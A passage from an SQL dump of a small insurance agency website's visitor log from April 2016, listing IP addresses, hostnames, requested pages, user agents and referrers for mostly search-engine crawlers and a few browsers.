OS','','','','','BingBot','','','','0','0',0),(21588,'0b_e2760cf351ee8209a5d34417c7b1b635','1461725094','208.115.111.66','208-115-111-66-reverse.wowrack.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21590,'0b_6ad523634905c4f3fda397cf5733fa54','1461726846','66.87.116.83','66-87-116-83.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','','','','','','','0','0',0),(21591,'0b_6ad523634905c4f3fda397cf5733fa54','1461726846','66.87.116.83','66-87-116-83.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','','','','','','','0','0',0),(21594,'0b_28b8bcd48145eaaab736679c43885679','1461729964','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21597,'0b_332df80330637a8f3e629c57a10cfde3','1461732345','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Opera/9.00 (Windows NT 5.1; U; en)','http://dneprsvet.com.ua/','',0,'WinXP','Opera 9','us','','','','','','','0','0',0),(21600,'0b_32fbf34636b0251b6674a64533074e87','1461732345','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Opera/9.00 (Windows NT 4.0; U; en)','http://lover.ru/','',0,'WinNT 4.0','Opera 9','us','','','','','','','0','0',0),(21602,'0b_02016b2f607a2dd45470a5b54fed5672','1461734645','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/insentives/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21603,'0b_02016b2f607a2dd45470a5b54fed5672','1461734678','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/licensing-contracting/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21605,'0b_02016b2f607a2dd45470a5b54fed5672','1461734710','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/carriers/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21606,'0b_02016b2f607a2dd45470a5b54fed5672','1461734736','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/term-quotes/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21609,'0b_02016b2f607a2dd45470a5b54fed5672','1461734736','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/case-status/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21612,'0b_02016b2f607a2dd45470a5b54fed5672','1461734739','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/forms/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21614,'0b_02016b2f607a2dd45470a5b54fed5672','1461734754','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21615,'0b_02016b2f607a2dd45470a5b54fed5672','1461734766','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/agent-tools/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21617,'0b_02016b2f607a2dd45470a5b54fed5672','1461734767','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/igo/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21618,'0b_f110f54fec20362d68b561d5b4bfb7e9','1461735234','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)','http://ship-marvel.co.ua/','',0,'Win2000','IE 5','ua','','','','','','','0','0',0),(21621,'0b_83b87aa7d955c98f281968dbdd6feeb4','1461735234','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)','http://woman-h.ru/','',0,'Win3.x','IE 5','ua','','','','','','','0','0',0),(21623,'0b_fd24b22575905644a425ad1c72cd955d','1461738032','66.249.73.187','crawl-66-249-73-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21626,'0b_fd24b22575905644a425ad1c72cd955d','1461738033','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21627,'0b_944630adadd9ce9de6bf538fec1a673b','1461738479','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21629,'0b_0807beddbb3f20f78918af55c598b5b8','1461741182','149.202.114.157','ip157.ip-149-202-114.eu','/register/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','0','0',0),(21632,'0b_b434f7e15e6463d69eacc98f9974c98d','1461741199','172.56.7.29','172.56.7.29','/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win10','','us','1366 x 768','','','','','','0','0',0),(21635,'0b_b434f7e15e6463d69eacc98f9974c98d','1461741205','172.56.7.29','172.56.7.29','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win10','','us','1366 x 768','','','','','','0','0',0),(21638,'0b_b434f7e15e6463d69eacc98f9974c98d','1461741278','172.56.7.29','172.56.7.29','/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win10','','us','1366 x 768','','','','','','0','0',0),(21639,'0b_b434f7e15e6463d69eacc98f9974c98d','1461741284','172.56.7.29','172.56.7.29','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win10','','us','1366 x 768','','','','','','0','0',0),(21642,'0b_5263a6cf2ba46cf46b47c2ec1ee2fa04','1461741926','198.50.200.139','198.50.200.139','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(21645,'0b_c4602bd0406708f1d69ec8a5371438b2','1461741937','5.196.66.162','ns330209.ip-5-196-66.eu','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','eu','','','','','','','2','0',0),(21648,'0b_91faeb7b7f771a87bc2467f869aaa9db','1461747814','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21650,'0b_dc45471d17b3414a77a6cfe52e2ef5cd','1461748496','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21653,'0b_925a9bdd2f0eeb8f2349909a0ed21866','1461748536','51.254.129.91','91.ip-51-254-129.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21654,'0b_925a9bdd2f0eeb8f2349909a0ed21866','1461748539','51.254.129.91','91.ip-51-254-129.eu','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21656,'0b_6c87c26bed8f2dae2ee197a5d8b48f26','1461750374','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)','http://forumsisadmina.ru/','',0,'WinXP','AOL 9','','','','','','','','0','0',0),(21659,'0b_7962efa05275154d872ad6f22300c39a','1461752096','149.202.48.246','246.ip-149-202-48.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21662,'0b_7962efa05275154d872ad6f22300c39a','1461752099','149.202.48.246','246.ip-149-202-48.eu','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21663,'0b_7962efa05275154d872ad6f22300c39a','1461752100','149.202.48.246','246.ip-149-202-48.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21665,'0b_7962efa05275154d872ad6f22300c39a','1461752102','149.202.48.246','246.ip-149-202-48.eu','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21668,'0b_7962efa05275154d872ad6f22300c39a','1461752104','149.202.48.246','246.ip-149-202-48.eu','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21671,'0b_7962efa05275154d872ad6f22300c39a','1461752111','149.202.48.246','246.ip-149-202-48.eu','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21674,'0b_7962efa05275154d872ad6f22300c39a','1461752117','149.202.48.246','246.ip-149-202-48.eu','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21677,'0b_7962efa05275154d872ad6f22300c39a','1461752119','149.202.48.246','246.ip-149-202-48.eu','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21678,'0b_b801e8ab2edcceddc820806026337715','1461752809','195.154.185.20','195-154-185-20.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(21681,'0b_b801e8ab2edcceddc820806026337715','1461752812','195.154.185.20','195-154-185-20.rev.poneytelecom.eu','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(21684,'0b_b801e8ab2edcceddc820806026337715','1461752815','195.154.185.20','195-154-185-20.rev.poneytelecom.eu','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(21686,'0b_b801e8ab2edcceddc820806026337715','1461752824','195.154.185.20','195-154-185-20.rev.poneytelecom.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(21689,'0b_b801e8ab2edcceddc820806026337715','1461752826','195.154.185.20','195-154-185-20.rev.poneytelecom.eu','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(21692,'0b_b801e8ab2edcceddc820806026337715','1461752869','195.154.185.20','195-154-185-20.rev.poneytelecom.eu','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(21695,'0b_6b5352fb7f1915b5d1bd9727ce1e320f','1461753297','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(21696,'0b_58889a4a97dd3cbc013770f7b5c6ce37','1461754147','208.115.111.66','208-115-111-66-reverse.wowrack.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21698,'0b_757375fd35ba9b32b4d21695b88fec69','1461757408','51.255.48.155','155.ip-51-255-48.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21701,'0b_757375fd35ba9b32b4d21695b88fec69','1461757414','51.255.48.155','155.ip-51-255-48.eu','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21702,'0b_77362cf8010278f021d3a10cf58ad792','1461760606','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21704,'0b_1b3a0ff5ac6bfdcb7665424cb83c83de','1461760691','136.243.152.18','static.18.152.243.136.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(21705,'0b_1b3a0ff5ac6bfdcb7665424cb83c83de','1461760696','136.243.152.18','static.18.152.243.136.clients.your-server.de','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(21707,'0b_1b3a0ff5ac6bfdcb7665424cb83c83de','1461760699','136.243.152.18','static.18.152.243.136.clients.your-server.de','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(21710,'0b_fbffea12e64df7af327e2d420d06f9b0','1461762488','204.248.0.197','nat.creditacceptance.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj_uorI8a7MAhXLMz4KHW5bCw0QFggdMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.120551593,d.cWw','',0,'Win7','IE 11','us','','','','','','','0','0',0),(21713,'0b_fbffea12e64df7af327e2d420d06f9b0','1461762491','204.248.0.197','nat.creditacceptance.com','/feed/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','','','','','','','0','0',0),(21716,'0b_fbffea12e64df7af327e2d420d06f9b0','1461762491','204.248.0.197','nat.creditacceptance.com','/home/feed/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','','','','','','','0','0',0),(21719,'0b_fbffea12e64df7af327e2d420d06f9b0','1461762491','204.248.0.197','nat.creditacceptance.com','/comments/feed/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','','','','','','','0','0',0),(21720,'0b_fbffea12e64df7af327e2d420d06f9b0','1461762492','204.248.0.197','nat.creditacceptance.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','','','','','','','0','0',0),(21723,'0b_4b7a7f56021b254cf2bdf9b713964adf','1461765653','85.214.245.199','h2456186.stratoserver.net','/','Mojolicious (Perl)','','',0,'','','','','','Mojolicious','','','','0','0',0),(21725,'0b_6d37d43b5b163fd7aa17596c576433a0','1461765953','40.117.234.230','40.117.234.230','/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21726,'0b_6d37d43b5b163fd7aa17596c576433a0','1461765972','40.117.234.230','40.117.234.230','/robots.txt','semanticbot','','',0,'','','','','','','','','','3','0',0),(21729,'0b_6d37d43b5b163fd7aa17596c576433a0','1461765981','40.117.234.230','40.117.234.230','/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21732,'0b_6d37d43b5b163fd7aa17596c576433a0','1461765991','40.117.234.230','40.117.234.230','/about-us','semanticbot','','',0,'','','','','','','','','','3','0',0),(21734,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766001','40.117.234.230','40.117.234.230','/about-us/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21735,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766011','40.117.234.230','40.117.234.230','/insentives','semanticbot','','',0,'','','','','','','','','','3','0',0),(21738,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766021','40.117.234.230','40.117.234.230','/insentives/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21740,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766031','40.117.234.230','40.117.234.230','/licensing-contracting','semanticbot','','',0,'','','','','','','','','','3','0',0),(21741,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766040','40.117.234.230','40.117.234.230','/licensing-contracting/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21744,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766050','40.117.234.230','40.117.234.230','/agent-tools','semanticbot','','',0,'','','','','','','','','','3','0',0),(21747,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766060','40.117.234.230','40.117.234.230','/agent-tools/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21749,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766071','40.117.234.230','40.117.234.230','/carriers','semanticbot','','',0,'','','','','','','','','','3','0',0),(21752,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766081','40.117.234.230','40.117.234.230','/carriers/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21755,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766091','40.117.234.230','40.117.234.230','/contact','semanticbot','','',0,'','','','','','','','','','3','0',0),(21756,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766100','40.117.234.230','40.117.234.230','/contact/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21758,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766111','40.117.234.230','40.117.234.230','/register','semanticbot','','',0,'','','','','','','','','','3','0',0),(21761,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766120','40.117.234.230','40.117.234.230','/register/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21764,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766130','40.117.234.230','40.117.234.230','/about-us/meet-the-eib-team','semanticbot','','',0,'','','','','','','','','','3','0',0),(21765,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766140','40.117.234.230','40.117.234.230','/meet-the-eib-team/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21767,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766160','40.117.234.230','40.117.234.230','/case-status','semanticbot','','',0,'','','','','','','','','','3','0',0),(21768,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766169','40.117.234.230','40.117.234.230','/case-status/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21770,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766180','40.117.234.230','40.117.234.230','/forms','semanticbot','','',0,'','','','','','','','','','3','0',0),(21773,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766190','40.117.234.230','40.117.234.230','/forms/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21776,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766202','40.117.234.230','40.117.234.230','/igo','semanticbot','','',0,'','','','','','','','','','3','0',0),(21779,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766212','40.117.234.230','40.117.234.230','/igo/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21782,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766223','40.117.234.230','40.117.234.230','/term-quotes','semanticbot','','',0,'','','','','','','','','','3','0',0),(21783,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766232','40.117.234.230','40.117.234.230','/term-quotes/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21785,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766242','40.117.234.230','40.117.234.230','/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21788,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766252','40.117.234.230','40.117.234.230','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product','semanticbot','','',0,'','','','','','','','','','3','0',0),(21789,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766266','40.117.234.230','40.117.234.230','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21792,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766322','40.117.234.230','40.117.234.230','/aig-releases-new-term-rates-and-re-enters-ny','semanticbot','','',0,'','','','','','','','','','3','0',0),(21794,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766322','40.117.234.230','40.117.234.230','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline','semanticbot','','',0,'','','','','','','','','','3','0',0),(21795,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766332','40.117.234.230','40.117.234.230','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21798,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766342','40.117.234.230','40.117.234.230','/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21800,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766352','40.117.234.230','40.117.234.230','/?page_id=171?a=pwdreset','semanticbot','','',0,'','','','','','','','','','3','0',0),(21803,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766362','40.117.234.230','40.117.234.230','/?page_id=169','semanticbot','','',0,'','','','','','','','','','3','0',0),(21804,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766371','40.117.234.230','40.117.234.230','/register/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21806,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766383','40.117.234.230','40.117.234.230','/meet-the-eib-team','semanticbot','','',0,'','','','','','','','','','3','0',0),(21807,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766393','40.117.234.230','40.117.234.230','/meet-the-eib-team/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21810,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766402','40.117.234.230','40.117.234.230','/members','semanticbot','','',0,'','','','','','','','','','3','0',0),(21813,'0b_6d37d43b5b163fd7aa17596c576433a0','1461766412','40.117.234.230','40.117.234.230','/members/','semanticbot','','',0,'','','','','','','','','','3','0',0),(21816,'0b_b0c34e2da7dab6c579c7678121b8945a','1461767330','198.12.85.135','198-12-85-135-host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50','EMPIREINS.COM','',0,'WinXP','Opera 8','','','','','','','','2','0',0),(21819,'0b_e90c5800689f1a3ef11d34c284bba2e5','1461767727','23.94.213.52','23-94-213-52-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Iron/29.0.1600.1 Chrome/29.0.1600.1 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 29','us','','','','','','','0','0',0),(21821,'0b_040d7349722d761fecd7a0fe1a44163b','1461768393','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21822,'0b_77aa66289a6cc1513aea1f2c0cea73d7','1461768453','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(21824,'0b_77aa66289a6cc1513aea1f2c0cea73d7','1461768453','68.180.230.123','b115363.yse.yahoo.net','/about-us/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(21825,'0b_040d7349722d761fecd7a0fe1a44163b','1461768520','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21828,'0b_040d7349722d761fecd7a0fe1a44163b','1461768579','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21831,'0b_040d7349722d761fecd7a0fe1a44163b','1461768601','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21834,'0b_040d7349722d761fecd7a0fe1a44163b','1461768650','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21836,'0b_214e3ebc79c8871d680d4f184474309c','1461769320','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21839,'0b_214e3ebc79c8871d680d4f184474309c','1461769324','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21842,'0b_214e3ebc79c8871d680d4f184474309c','1461769326','69.175.67.58','newscan04.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21845,'0b_214e3ebc79c8871d680d4f184474309c','1461769338','69.175.67.58','newscan04.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21846,'0b_621656e7f795e5ffc5416111379d4576','1461770403','141.8.143.242','spider-141-8-143-242.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(21848,'0b_a78be6a3097144715ef56a6fcb58502d','1461770407','100.43.81.152','spider-100-43-81-152.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(21849,'0b_a78be6a3097144715ef56a6fcb58502d','1461770542','100.43.81.152','spider-100-43-81-152.yandex.com','/term-quotes/','Mozilla/5.0 (compatible; YandexBot/3.0; 